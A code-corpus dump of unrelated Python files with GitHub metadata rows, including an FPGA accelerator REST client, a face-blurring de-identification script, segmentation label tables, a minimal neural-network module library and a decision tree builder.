session_kwargs['verify'] = self._ssl_cert_crt
# Disables hostname verification if wildcard certificate
from apyfal._certificates import \
get_host_names_from_certificate
with open(self._ssl_cert_crt, 'rb') as crt_file:
if get_host_names_from_certificate(crt_file.read()) == ['*']:
session_kwargs['assert_hostname'] = False
# Force url to use HTTPS
self._url = _utl.format_url(
self._url, force_secure=bool(self._ssl_cert_crt))
# Initializes session
return _utl.http_session(**session_kwargs)
@property
def url(self):
"""
URL of the accelerator host.
Returns:
str: URL
"""
return self._url
@url.setter
def url(self, url):
"""
URL of the accelerator host.
Args:
url (str): URL.
"""
# Check URL
if not url:
raise _exc.ClientConfigurationException("Host URL is not valid.")
self._url = url = _utl.format_url(
url, force_secure=bool(self._ssl_cert_crt))
# Updates endpoints
for route in self._REST_API:
self._endpoints[route] = url + self._REST_API[route]
@property
@_utl.memoizedmethod
def _configuration_url(self):
"""Last configuration URL"""
# Get last configuration, if any
try:
endpoint = self._endpoints['start']
except KeyError:
raise _exc.ClientConfigurationException(
'Unknown host URL, please run accelerator "start" method.')
response = self._session.get(endpoint)
try:
last_config = response.json()['results'][0]
except (KeyError, IndexError, ValueError):
return
# The last configuration URL should be keep in order to not request
# it to user.
if last_config['used'] != 0:
return last_config['url']
@property
def ssl_cert_crt(self):
"""
SSL Certificate of the accelerator host.
Returns:
str: Path to ssl_cert_key.
"""
return self._ssl_cert_crt
def _is_alive(self):
"""
Check if accelerator URL exists.
Raises:
ClientRuntimeException: If URL not alive
"""
if self.url is None:
raise _exc.ClientRuntimeException("No accelerator running")
if not _utl.check_url(self.url, max_retries=2):
raise _exc.ClientRuntimeException(
gen_msg=('unable_reach_url', self._url))
def _start(self, src, parameters):
"""
Client specific start implementation.
Args:
src (str or file-like object): Input file.
parameters (dict): Parameters dict.
Returns:
dict: response.
"""
# Save Apyfal version in parameters
parameters['env']['apyfal_version'] = _apyfal_version
# Post accelerator configuration
fields = {'parameters': _json.dumps(parameters)}
if src:
fields['datafile'] = (
'src', src, 'application/octet-stream')
multipart = _MultipartEncoder(fields=fields)
response = self._session.post(
self._endpoints['start'], data=multipart, headers={
'Content-Type': multipart.content_type})
# Checks response, gets Configuration result
response_dict = self._raise_for_error(response)
config_result = response_dict['parametersresult']
# Checks if configuration was successful
response_dict = self._raise_for_error(self._session.get(
self._endpoints['start'] + str(response_dict['id'])))
# Memorizes configuration
self._cache['_configuration_url'] = response_dict['url']
# Returns response
config_result['url_config'] = self._configuration_url
config_result['url_instance'] = self.url
return config_result
def _process(self, src, dst, parameters):
"""
Client specific process implementation.
Args:
src (file-like object): Input data.
dst (file-like object): Output data.
parameters (dict): Parameters dict.
Returns:
dict: response dict.
"""
# Check if configuration was done
if self._configuration_url is None:
raise _exc.ClientConfigurationException(
"AcceleratorClient has not been configured. "
"Use 'start' function.")
# Post processing request
fields = {
'parameters': _json.dumps(parameters),
'configuration': self._configuration_url}
if src:
fields['datafile'] = 'src', src, 'application/octet-stream'
multipart = _MultipartEncoder(fields=fields)
response = self._session.post(
self._endpoints['process'], data=multipart, headers={
'Content-Type': multipart.content_type})
# Check response and append process ID to process URL
process_url = self._endpoints['process'] + str(
self._raise_for_error(response)['id'])
# Get result
try:
# Wait processing
while True:
response_dict = self._raise_for_error(
self._session.get(process_url))
if response_dict['processed']:
break
# Gets result file
if dst:
response = self._session.get(
response_dict['datafileresult'], stream=True)
_shutil.copyfileobj(response.raw, dst)
# Gets result dict
return response_dict['parametersresult']
finally:
# Deletes process result on server
self._session.delete(process_url)
def _stop(self):
"""
Client specific stop implementation.
Returns:
dict : response.
"""
try:
self._is_alive()
except _exc.ClientRuntimeException:
# No AcceleratorClient to stop
return dict()
# Sends stop to server
return self._session.get(self.url + self._REST_API['stop']).json()
@staticmethod
def _raise_for_error(response):
    """
    Raises for error and returns response dict.

    Args:
        response (requests.Response): Response

    Returns:
        dict: Response JSON dict

    Raises:
        apyfal.exceptions.ClientRuntimeException: HTTP error, unparsable
            payload, or the host-side 'inerror' flag is set/missing.
    """
    # HTTP-level failure: wrap the requests exception
    try:
        response.raise_for_status()
    except _HTTPError as http_error:
        raise _exc.ClientRuntimeException(exc=http_error)

    # The payload must be JSON
    try:
        payload = response.json()
    except ValueError:
        raise _exc.ClientRuntimeException(
            "Unable to parse host response", exc=response.text)

    # Application-level failure flag; a missing flag is treated as an error
    in_error = payload.get('inerror', True)
    if in_error:
        raise _exc.ClientRuntimeException(
            "Host returned an error", exc=response.text)
    return payload
| [
"jgoutin@accelize.com"
] | jgoutin@accelize.com |
8ae995081466ba06b2a88a80dbe3340a77564352 | 155ccd0d511d48a40aa391be6363c7614af67876 | /deid_fac_rec.py | faacaee02ad5126fa83de391c880526d25886217 | [] | no_license | drewclausen/HIsummerproject | dcce722ac97d07e37ed2e3275d1b9e70457587c9 | 8596a2132abdf7a2ee500d8a8a089ffb5db43fbd | refs/heads/master | 2020-03-18T13:15:25.405100 | 2018-07-11T23:24:01 | 2018-07-11T23:24:01 | 134,771,880 | 0 | 2 | null | 2018-06-08T00:10:51 | 2018-05-24T21:44:17 | Python | UTF-8 | Python | false | false | 1,192 | py | from PIL import Image
from PIL import ImageFilter
from PIL import ImageEnhance
from StringIO import StringIO
import pandas as pd
import numpy as np
import pytesseract
import glob
import cv2
import future_builtins
import subprocess
import os
import sys
import re
import face_recognition
# Batch face de-identification: detect faces in every training image and
# blur them in place, writing the result into a parallel "train_deid" tree.
# NOTE: written for Python 2 (print statements).
DIR = '/home/pikachu/PycharmProjects/deidentification/Scraped_Images/Faces/train/'
batch = 32
images = []
fnames = glob.glob(DIR + '*.jpg')
for fname in fnames:
    print fname
    # Derived output paths: "_pre" (unused below) and the de-identified copy
    fname_pre = fname.replace('train', 'train_pre')
    fname_deid = fname.replace('train', 'train_deid').replace('.', '_deid.')
    #im = Image.open(fname)
    #image = face_recognition.load_image_file(fname)
    image = cv2.imread(fname)
    # Each detected face is a (top, right, bottom, left) bounding box
    face_locations = face_recognition.face_locations(image)
    for face in face_locations:
        print face
        (top, right, bottom, left) = face
        face_image = image[top:bottom, left:right]
        # Blur the face image with a large Gaussian kernel
        face_image = cv2.GaussianBlur(face_image, (99, 99), 30)
        # Put the blurred face region back into the frame image
        image[top:bottom, left:right] = face_image
        #im.paste(ic, box)
    cv2.imwrite(fname_deid, image)
| [
"noreply@github.com"
] | drewclausen.noreply@github.com |
145b81cc8e89eadb2199ff2a224737e05fd9b277 | 4b957eee31825b0e4ba130e92f1eef4093c23c88 | /venv/bin/easy_install-3.6 | 5f068d38d2991b6357b174d098d65e4fe613def3 | [
"MIT"
] | permissive | probantan/Awwards | 53ab83ccf9d3ad8d23cbf9793daae9954090d6d7 | 9cfe3d8fbe94637908128f1b982d7a99cf7a57d2 | refs/heads/master | 2022-12-05T21:19:04.669296 | 2019-06-04T15:47:30 | 2019-06-04T15:47:30 | 152,769,801 | 0 | 0 | null | 2022-11-22T03:50:32 | 2018-10-12T15:16:43 | Python | UTF-8 | Python | false | false | 265 | 6 | #!/home/protus/Documents/awwwards/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"protus.bantan@gmail.com"
] | protus.bantan@gmail.com |
84ea579dc7e53db3bd178af01dd9896e9f4556b4 | bb5f5283fccab376218ab2c7d12955cbea176733 | /testing/DeepLabv3_pytorch/src/apollo_utilities/labels_apollo.py | 445963f9877657e17985d6c593e58eac5014e1d2 | [] | no_license | Avishaek/ir-project | 4c08b824a09e8205d0192b3898ec61674a30b1ea | 265e1a60542cb1668706213835de716a6899acef | refs/heads/master | 2023-08-13T22:58:43.098925 | 2020-10-10T09:23:29 | 2020-10-10T09:23:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,208 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Zpark labels"""
from collections import namedtuple
#--------------------------------------------------------------------------------
# Definitions
#--------------------------------------------------------------------------------
# a label and all meta information
Label = namedtuple('Label', [
    'name',          # Unique identifier of this label, e.g. 'car', 'person', ...
                     # Used to uniquely name a class.
    'clsId',         # NOTE(review): undocumented upstream — presumably the raw
                     # Apollo hexadecimal class encoding; verify against the
                     # ApolloScape label definitions.
    'id',            # Integer ID associated with this label; used to represent
                     # the label in ground-truth images. -1 means the label has
                     # no ID and is ignored when creating ground-truth images.
                     # Do not modify: the evaluation server expects exactly
                     # these IDs.
    'trainId',       # Training ID; feel free to remap as suitable for your
                     # method, then create ground-truth images with train IDs.
                     # Multiple labels may share one trainId (mapped to the
                     # same class); the inverse mapping uses the label defined
                     # first in the list below. Max value is 255.
    'category',      # Name of the category this label belongs to.
    'categoryId',    # ID of this category; used for category-level ground truth.
    'hasInstances',  # Whether this label distinguishes single instances.
    'ignoreInEval',  # Whether pixels with this ground-truth label are ignored
                     # during evaluation.
    'color',         # Color of this label as a single 0xRRGGBB integer.
])
#--------------------------------------------------------------------------------
# A list of all labels
#--------------------------------------------------------------------------------
# Please adapt the train IDs as appropriate for you approach.
# Note that you might want to ignore labels with ID 255 during training.
# Further note that the current train IDs are only a suggestion. You can use whatever you like.
# Make sure to provide your results using the original IDs and not the training IDs.
# Note that many IDs are ignored in evaluation and thus you never need to predict these!
labels = [
# name clsId id trainId category catId hasInstanceignoreInEval color
Label('others' , 0 , 0, 255 , '其他' , 0 ,False , True , 0x000000 ),
Label('rover' , 0x01 , 1, 255 , '其他' , 0 ,False , True , 0X000000 ),
Label('sky' , 0x11 , 17, 0 , '天空' , 1 ,False , False , 0x4682B4 ),
Label('car' , 0x21 , 33, 1 , '移动物体', 2 ,True , False , 0x00008E ),
Label('car_groups' , 0xA1 , 161, 1 , '移动物体', 2 ,True , False , 0x00008E ),
Label('motorbicycle' , 0x22 , 34, 2 , '移动物体', 2 ,True , False , 0x0000E6 ),
Label('motorbicycle_group' , 0xA2 , 162, 2 , '移动物体', 2 ,True , False , 0x0000E6 ),
Label('bicycle' , 0x23 , 35, 3 , '移动物体', 2 ,True , False , 0x770B20 ),
Label('bicycle_group' , 0xA3 , 163, 3 , '移动物体', 2 ,True , False , 0x770B20 ),
Label('person' , 0x24 , 36, 4 , '移动物体', 2 ,True , False , 0x0080c0 ),
Label('person_group' , 0xA4 , 164, 4 , '移动物体', 2 ,True , False , 0x0080c0 ),
Label('rider' , 0x25 , 37, 5 , '移动物体', 2 ,True , False , 0x804080 ),
Label('rider_group' , 0xA5 , 165, 5 , '移动物体', 2 ,True , False , 0x804080 ),
Label('truck' , 0x26 , 38, 6 , '移动物体', 2 ,True , False , 0x8000c0 ),
Label('truck_group' , 0xA6 , 166, 6 , '移动物体', 2 ,True , False , 0x8000c0 ),
Label('bus' , 0x27 , 39, 7 , '移动物体', 2 ,True , False , 0xc00040 ),
Label('bus_group' , 0xA7 , 167, 7 , '移动物体', 2 ,True , False , 0xc00040 ),
Label('tricycle' , 0x28 , 40, 8 , '移动物体', 2 ,True , False , 0x8080c0 ),
Label('tricycle_group' , 0xA8 , 168, 8 , '移动物体', 2 ,True , False , 0x8080c0 ),
Label('road' , 0x31 , 49, 9 , '平面' , 3 ,False , False , 0xc080c0 ),
Label('siderwalk' , 0x32 , 50, 10 , '平面' , 3 ,False , False , 0xc08040 ),
Label('traffic_cone' , 0x41 , 65, 11 , '路间障碍', 4 ,False , False , 0x000040 ),
Label('road_pile' , 0x42 , 66, 12 , '路间障碍', 4 ,False , False , 0x0000c0 ),
Label('fence' , 0x43 , 67, 13 , '路间障碍', 4 ,False , False , 0x404080 ),
Label('traffic_light' , 0x51 , 81, 14 , '路边物体', 5 ,False , False , 0xc04080 ),
Label('pole' , 0x52 , 82, 15 , '路边物体', 5 ,False , False , 0xc08080 ),
Label('traffic_sign' , 0x53 , 83, 16 , '路边物体', 5 ,False , False , 0x004040 ),
Label('wall' , 0x54 , 84, 17 , '路边物体', 5 ,False , False , 0xc0c080 ),
Label('dustbin' , 0x55 , 85, 18 , '路边物体', 5 ,False , False , 0x4000c0 ),
Label('billboard' , 0x56 , 86, 19 , '路边物体', 5 ,False , False , 0xc000c0 ),
Label('building' , 0x61 , 97, 20 , '建筑' , 6 ,False , False , 0xc00080 ),
Label('bridge' , 0x62 , 98, 255 , '建筑' , 6 ,False , True , 0x808000 ),
Label('tunnel' , 0x63 , 99, 255 , '建筑' , 6 ,False , True , 0x800000 ),
Label('overpass' , 0x64 , 100, 255 , '建筑' , 6 ,False , True , 0x408040 ),
Label('vegatation' , 0x71 , 113, 21 , '自然' , 7 ,False , False , 0x808040 ),
Label('unlabeled' , 0xFF , 255, 255 , '未标注' , 8 ,False , True , 0xFFFFFF ),
]
#--------------------------------------------------------------------------------
# Create dictionaries for a fast lookup
#--------------------------------------------------------------------------------
# Please refer to the main method below for example usages!
# name to label object
name2label = {label.name: label for label in labels}
# id to label object
id2label = {label.id: label for label in labels}
# trainId to label object
trainId2label = {label.trainId: label for label in reversed(labels)}
# category to list of label objects
category2labels = {}
for label in labels:
category = label.category
if category in category2labels:
category2labels[category].append(label)
else:
category2labels[category] = [label]
color2label = {}
for label in labels:
#color = (int(label.color[2:4],16),int(label.color[4:6],16),int(label.color[6:8],16))
color = label.color
r = color // (256*256)
g = (color-256*256*r) // 256
b = (color-256*256*r-256*g)
color2label[(r, g, b)] = [label]
#--------------------------------------------------------------------------------
# Assure single instance name
#--------------------------------------------------------------------------------
""" returns the label name that describes a single instance (if possible)
e.g. input | output
----------------------
car | car
cargroup | car
foo | None
foogroup | None
skygroup | None
"""
def assureSingleInstanceName(name):
    """Return the label name that describes a single instance, or None.

    e.g. 'car' -> 'car'; 'cargroup' -> 'car';
    'foo', 'foogroup', 'skygroup' -> None.
    """
    # if the name is known, it is not a group
    if name in name2label:
        return name
    # test if the name actually denotes a group
    if not name.endswith("group"):
        return None
    # remove the "group" suffix
    name = name[:-len("group")]
    # the base name must be a known label...  (idiomatic `not in`)
    if name not in name2label:
        return None
    # ...and one that actually distinguishes instances
    if not name2label[name].hasInstances:
        return None
    # all good then
    return name
#--------------------------------------------------------------------------------
# Main for testing
#--------------------------------------------------------------------------------
# just a dummy main
if __name__ == "__main__":
    # Print all the labels
    print("List of cityscapes labels:")
    print("")
    print(" {:>21} | {:>3} | {:>7} | {:>14} |".format('name', 'id', 'trainId', 'category')\
        + "{:>10} | {:>12} | {:>12}".format('categoryId', 'hasInstances', 'ignoreInEval'))
    print(" " + ('-' * 98))
    for label in labels:
        print(" {:>21} | {:>3} | {:>7} |".format(label.name, label.id, label.trainId)\
            + " {:>14} |{:>10} ".format(label.category, label.categoryId)\
            + "| {:>12} | {:>12}".format(label.hasInstances, label.ignoreInEval ))
    print("")
    print("Example usages:")
    # Map from name to label.
    # Fix: the previous example used '机动车', which is not a defined label
    # name (all `name` fields in `labels` are English), so
    # name2label['机动车'] raised KeyError at runtime.
    name = 'car'
    id = name2label[name].id
    print("ID of label '{name}': {id}".format(name=name, id=id))
    # Map from ID to label
    category = id2label[id].category
    print("Category of label with ID '{id}': {category}".format(id=id, category=category))
    # Map from trainID to label
    trainId = 0
    name = trainId2label[trainId].name
    print("Name of label with trainID '{id}': {name}".format(id=trainId, name=name))
| [
"hasanhaja@gmail.com"
] | hasanhaja@gmail.com |
51aaebc35564d5dae0bcbbb59a5ba354c953f921 | 854e3208abe868cc5b2b7ab2accc9644c4eefbbe | /code/modules.py | 12319e5cae2342ef9f5f62cb3d1719356c72d0a4 | [] | no_license | vbordign/DL-mini | 5e8b5acf73ebeba763eb507a1c3671cc3e0dce7d | 8529689993565c6377d548caac2254b071883a81 | refs/heads/main | 2023-06-28T19:31:41.527134 | 2021-07-26T08:19:46 | 2021-07-26T08:19:46 | 367,988,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,363 | py | from torch import empty
from initialization import *
class Module(object):
    """Abstract base class for every network component.

    Subclasses implement the forward pass, the backward (gradient) pass,
    and expose their trainable parameters.

    Methods
    -------
    forward :
        runs a forward pass
    backward :
        accumulates gradient for backward pass
    param :
        returns parameters
    """

    def forward(self, *input):
        """Run a forward pass; must be overridden by subclasses."""
        raise NotImplementedError

    def backward(self, *gradwrtoutput):
        """Propagate gradients backwards; must be overridden by subclasses."""
        raise NotImplementedError

    def param(self):
        """Return the list of [parameter, gradient] pairs (none by default)."""
        return []
class Linear(Module):
    """Fully-connected (affine) layer: y = W x + b.

    Attributes
    ----------
    bias_flag : bool
        Whether a trainable bias is used. When False a zero bias (with a
        zero gradient) is still stored so `forward`/`param` work uniformly.
    w : list
        [weight tensor (out_features x in_features), gradient tensor].
    bias : list
        [bias tensor (out_features x 1), gradient tensor].

    Methods
    -------
    forward :
        runs a forward pass (caches the input for the backward pass)
    backward :
        stores the gradients (overwrites, does not accumulate) and returns
        the gradient with respect to the input
    param :
        returns [[w, dw], [bias, dbias]]
    """
    def __init__(self, in_features, out_features, bias_flag=True, init='uniform'):
        # `init` selects the weight initializer: 'xavier' -> xavier-normal,
        # anything else -> uniform.
        super().__init__()
        self.bias_flag = bias_flag
        if init == 'xavier':
            self.w = [initialize_xavier_normal(empty(out_features, in_features)),
                      empty(out_features, in_features).zero_()]
        else:
            self.w = [initialize_uniform(empty(out_features, in_features)),
                      empty(out_features, in_features).zero_()]
        if bias_flag:
            if init == 'xavier':
                self.bias = [initialize_xavier_normal(empty(out_features, 1)),
                             empty(out_features, 1).zero_()]
            else:
                self.bias = [initialize_uniform(empty(out_features, 1)),
                             empty(out_features, 1).zero_()]
        else:
            # Frozen zero bias: forward still adds it, backward never updates it.
            self.bias = [empty(out_features, 1).zero_(), empty(out_features, 1).zero_()]

    def forward(self, x):
        # x is expected as (batch, in_features); the input is cached for backward.
        self.x = x
        output = self.w[0].mm(x.t()) + self.bias[0]
        return output.t()

    def backward(self, gradwrtoutput):
        # gradwrtoutput: (batch, out_features). Gradients are REPLACED here,
        # not accumulated across calls.
        if self.bias_flag:
            self.bias[1] = gradwrtoutput.sum(0)[:, None]
        self.w[1] = gradwrtoutput.t().mm(self.x)
        # Gradient with respect to the layer input.
        return gradwrtoutput.mm(self.w[0])

    def param(self):
        return [self.w, self.bias]
class Sequential(Module):
    """Container that chains modules and evaluates them in order.

    Attributes
    ----------
    modules : list of Module
        The contained layers, in forward order.

    Methods
    -------
    forward :
        runs a forward pass through every module in order
    backward :
        propagates the gradient through the modules in reverse order
    param :
        returns the concatenated parameter list of all modules
    zero_grad :
        resets every stored gradient to zero
    """

    def __init__(self, *args):
        super(Sequential, self).__init__()
        self.modules = list(args)

    def forward(self, x):
        out = x
        for layer in self.modules:
            out = layer.forward(out)
        return out

    def backward(self, gradwrtoutput):
        grad = gradwrtoutput
        for layer in reversed(self.modules):
            grad = layer.backward(grad)

    def param(self):
        params = []
        for layer in self.modules:
            params += layer.param()
        return params

    def zero_grad(self):
        # Each entry is a [parameter, gradient] pair; zero the gradient in place.
        for p in self.param():
            p[1].zero_()
| [
"virginia.bordignon@epfl.ch"
] | virginia.bordignon@epfl.ch |
2d6e5f19e61795d94a3b817b0a1f16c5256a54de | f2da63de512183804290bfcabfa60eaca3649e05 | /projects/StatCan/non-probability/handcraftsman/chap03/code/dtree.py | 0f015898b2acb2e4ed655a7df2ecca353250e4b5 | [] | no_license | paradisepilot/statistics | a94bb57ebe453d49c06815c523e8f633423cb68e | 50daf644baca1f40253edf91083ed42d4c5f9342 | refs/heads/master | 2022-07-25T16:19:07.751886 | 2022-06-26T21:18:38 | 2022-06-26T21:18:38 | 5,012,656 | 0 | 2 | null | 2019-04-22T06:52:55 | 2012-07-13T01:11:42 | HTML | UTF-8 | Python | false | false | 9,345 | py | # File: dtree.py
# from chapter 3 of _Tree-based Machine Learning Algorithms_
#
# Author: Clinton Sheppard <fluentcoder@gmail.com>
# Copyright (c) 2017 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
from numbers import Number
import operator
import math
def build(data, outcomeLabel, continuousAttributes=None):
    """Build a decision tree from tabular data.

    data: list of rows; data[0] is the header (column labels), the rest are
        samples. outcomeLabel names the target column. continuousAttributes,
        when given, names the columns to treat as continuous; otherwise any
        column whose values are all numeric is auto-detected as continuous.
    Returns a DTree. Emits verbose debug prints while building.
    """
    # Indexes of the feature columns (everything except the outcome column)
    attrIndexes = [index for index, label in enumerate(data[0]) if label != outcomeLabel]
    print( "attrIndexes: " + str(attrIndexes) )
    outcomeIndex = data[0].index(outcomeLabel)
    print( "outcomeIndex: " + str(outcomeIndex) )
    continuousAttrIndexes = set()
    if continuousAttributes is not None:
        continuousAttrIndexes = {data[0].index(label) for label in continuousAttributes}
        if len(continuousAttrIndexes) != len(continuousAttributes):
            raise Exception('One or more continuous column names are duplicates.')
    else:
        # Auto-detect: a column is continuous when every value is numeric
        for attrIndex in attrIndexes:
            uniqueValues = {row[attrIndex] for rowIndex, row in enumerate(data) if rowIndex > 0}
            numericValues = {value for value in uniqueValues if isinstance(value, Number)}
            if len(uniqueValues) == len(numericValues):
                continuousAttrIndexes.add(attrIndex)
    print( "continuousAttrIndexes: " + str(continuousAttrIndexes) )
    nodes = []
    lastNodeNumber = 0
    # Work queue of (parentNodeId, nodeId, row indexes still to split)
    workQueue = [ (-1, lastNodeNumber, set(i for i in range(1, len(data)))) ]
    while len(workQueue) > 0:
        print( "~~~~~~~~~~" )
        parentNodeId, nodeId, dataRowIndexes = workQueue.pop()
        print(
            "parentNodeId: " + str(parentNodeId) + ", " +
            "nodeId: " + str(nodeId) + ", " +
            "dataRowIndexes: " + str(dataRowIndexes)
        )
        uniqueOutcomes = set(data[i][outcomeIndex] for i in dataRowIndexes)
        if len(uniqueOutcomes) == 1:
            # Pure subset -> leaf node (nodeId, outcome)
            nodes.append((nodeId, uniqueOutcomes.pop()))
            continue
        # Candidate splits, best (highest bias) first
        potentials = _get_potentials(
            attrIndexes = attrIndexes,
            continuousAttrIndexes = continuousAttrIndexes,
            data = data,
            dataRowIndexes = dataRowIndexes,
            outcomeIndex = outcomeIndex
        )
        attrIndex, attrValue, isMatch = potentials[0][1:]
        print(
            "attrIndex: " + str(attrIndex) + ", " +
            "attrValue: " + str(attrValue) + ", " +
            "isMatch: " + str(isMatch)
        )
        matches = {
            rowIndex for rowIndex in dataRowIndexes
            if isMatch(data[rowIndex][attrIndex],attrValue)
        }
        nonMatches = dataRowIndexes - matches
        # Queue both children for further splitting
        lastNodeNumber += 1
        matchId = lastNodeNumber
        workQueue.append((nodeId, matchId, matches))
        print( " match: " + str( (nodeId, matchId, matches) ) )
        lastNodeNumber += 1
        nonMatchId = lastNodeNumber
        workQueue.append((nodeId, nonMatchId, nonMatches))
        print( "non-match: " + str( (nodeId, nonMatchId, nonMatches) ) )
        # Internal node: (id, attr, value, comparator, yesChild, noChild, yesCount, noCount)
        nodes.append(
            (nodeId, attrIndex, attrValue, isMatch, matchId, nonMatchId, len(matches), len(nonMatches))
        )
    print( "~~~~~~~~~~" )
    # Nodes are addressed by index in DTree, so sort by node id
    nodes = sorted(nodes, key = lambda n: n[0])
    return DTree(nodes, data[0])
def _get_potentials(
        attrIndexes,
        continuousAttrIndexes,
        data,
        dataRowIndexes,
        outcomeIndex
):
    """Enumerate and rank candidate splits for the given subset of rows.

    Discrete attributes contribute (attr, value, ==) pairs for every value
    seen in the subset; continuous attributes contribute (attr, threshold, >)
    pairs. Returns tuples (-bias, attrIndex, attrValue, comparator) sorted
    ascending, i.e. the highest-bias (best) split comes first.
    """
    # Equality splits for every discrete attribute/value combination present
    uniqueAttributeValuePairs = {
        (attrIndex, data[rowIndex][attrIndex], operator.eq)
        for attrIndex in attrIndexes
        if attrIndex not in continuousAttrIndexes
        for rowIndex in dataRowIndexes
    }
    print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
    print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
    print()
    # Threshold splits for the continuous attributes
    continuousAttributeValuePairs = _get_continuous_av_pairs(
        continuousAttrIndexes,
        data,
        dataRowIndexes
    )
    print( "continuousAttributeValuePairs: " + str(continuousAttributeValuePairs) )
    print( "len(continuousAttributeValuePairs) = " + str(len(continuousAttributeValuePairs)) )
    print()
    uniqueAttributeValuePairs |= continuousAttributeValuePairs
    print( "uniqueAttributeValuePairs: " + str(uniqueAttributeValuePairs) )
    print( "len(uniqueAttributeValuePairs) = " + str(len(uniqueAttributeValuePairs)) )
    print()
    # Negated bias so that ascending sort puts the best candidate first
    potentials = sorted(
        (-_get_bias(avPair, dataRowIndexes, data, outcomeIndex), avPair[0], avPair[1], avPair[2])
        for avPair in uniqueAttributeValuePairs
    )
    print( "potentials: " + str(potentials) )
    print( "len(potentials) = " + str(len(potentials)) )
    print()
    return potentials
def _get_continuous_av_pairs(continuousAttrIndexes, data, dataRowIndexes):
    """Build candidate (attribute, threshold, >) split pairs for every
    continuous attribute, taking thresholds at value discontinuities."""
    pairs = set()
    for attr in continuousAttrIndexes:
        values = sorted(data[row][attr] for row in dataRowIndexes)
        # Heuristic cap on how many candidate thresholds to sample
        cap = max(math.sqrt(len(values)), min(10, len(values)))
        for idx in _get_discontinuity_indexes(values, cap):
            pairs.add((attr, values[idx], operator.gt))
    return pairs
def _get_discontinuity_indexes(sortedAttrValues, maxIndexes):
indexes = []
for i in _generate_discontinuity_indexes_center_out(sortedAttrValues):
indexes.append(i)
if len(indexes) >= maxIndexes:
break
return indexes
def _generate_discontinuity_indexes_center_out(sortedAttrValues):
# print( "sortedAttrValues: " + str(sortedAttrValues) )
center = len(sortedAttrValues) // 2
left = center - 1
right = center + 1
while left >= 0 or right < len(sortedAttrValues):
if left >= 0:
if sortedAttrValues[left] != sortedAttrValues[left + 1]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(left)
# )
yield left
left -= 1
if right < len(sortedAttrValues):
if sortedAttrValues[right - 1] != sortedAttrValues[right]:
#print(
# "center: " + str(center) + ", " +
# "left: " + str(left) + ", " +
# "right: " + str(right) + "; " +
# "yield: " + str(right - 1)
# )
yield right - 1
right += 1
def _get_bias(avPair, dataRowIndexes, data, outcomeIndex):
attrIndex, attrValue, isMatch = avPair
matchIndexes = {i for i in dataRowIndexes if isMatch(data[i][attrIndex], attrValue)}
nonMatchIndexes = dataRowIndexes - matchIndexes
matchOutcomes = {data[i][outcomeIndex] for i in matchIndexes}
nonMatchOutcomes = {data[i][outcomeIndex] for i in nonMatchIndexes}
numPureRows = (len(matchIndexes) if len( matchOutcomes) == 1 else 0) \
+ (len(nonMatchIndexes) if len(nonMatchOutcomes) == 1 else 0)
percentPure = numPureRows / len(dataRowIndexes)
numNonPureRows = len(dataRowIndexes) - numPureRows
percentNonPure = 1 - percentPure
split = 1 - abs(len(matchIndexes) - len(nonMatchIndexes)) / len(dataRowIndexes) - .001
splitBias = split * percentNonPure if numNonPureRows > 0 else 0
return splitBias + percentPure
class DTree:
    """Decision tree over a flat node list addressed by node id.

    Leaf nodes are (nodeId, outcome) pairs; internal nodes are
    (nodeId, attrIndex, attrValue, comparator, yesChildId, noChildId,
    yesCount, noCount) tuples. Node ids double as list indexes.
    """

    def __init__(self, nodes, attrNames):
        self._nodes = nodes
        self._attrNames = attrNames

    @staticmethod
    def _is_leaf(node):
        # Leaves carry exactly (nodeId, outcome).
        return len(node) == 2

    def __str__(self):
        lines = []
        for node in self._nodes:
            if self._is_leaf(node):
                lines.append('{}: {}\n'.format(node[0], node[1]))
                continue
            (nodeId, attrIndex, attrValue, isMatch, matchId,
             nonMatchId, matchCount, nonMatchCount) = node
            comparator = '=' if isMatch == operator.eq else '>'
            lines.append('{0}: {1}{7}{2}, {5} Yes->{3}, {6} No->{4}\n'.format(
                nodeId, self._attrNames[attrIndex], attrValue,
                matchId, nonMatchId, matchCount, nonMatchCount, comparator))
        return ''.join(lines)

    def get_prediction(self, data):
        """Walk the tree from the root for one data row; return the leaf outcome."""
        node = self._nodes[0]
        while not self._is_leaf(node):
            attrIndex, attrValue, isMatch, matchId, nonMatchId = node[1:6]
            next_id = matchId if isMatch(data[attrIndex], attrValue) else nonMatchId
            node = self._nodes[next_id]
        return node[1]
"paradisepilot@gmail.com"
] | paradisepilot@gmail.com |
8dbe189d86a7db8906f28ee1d66bafbbfb7fa828 | 93e9b5aeafbf3a210ef2fc1cca8f19b755ff2be1 | /test/workshop/joint_fit_example/VERITASLike.py | 168aab6b2b0971321333efd6d714029b33841a4e | [
"Apache-2.0"
] | permissive | jasonfan1997/umd_icecube_analysis_tutorial | 5805bcf74411fd864df4932e61daac1241cd5a54 | 50bf3af27f81d719953ac225f199e733b5c0bddf | refs/heads/master | 2023-01-09T01:06:16.750101 | 2020-11-03T21:08:58 | 2020-11-03T21:08:58 | 269,291,684 | 0 | 0 | Apache-2.0 | 2020-06-04T07:35:59 | 2020-06-04T07:35:58 | null | UTF-8 | Python | false | false | 18,376 | py | __author__ = 'giacomov'
#Udara created this version just after the git comit
import collections
import ROOT
import numpy as np
import scipy.integrate
import astromodels
from threeML.io.cern_root_utils.io_utils import get_list_of_keys, open_ROOT_file
from threeML.io.cern_root_utils.tobject_to_numpy import tgraph_to_arrays, th2_to_arrays, tree_to_ndarray
from threeML.plugin_prototype import PluginPrototype
from threeML.exceptions.custom_exceptions import custom_warnings
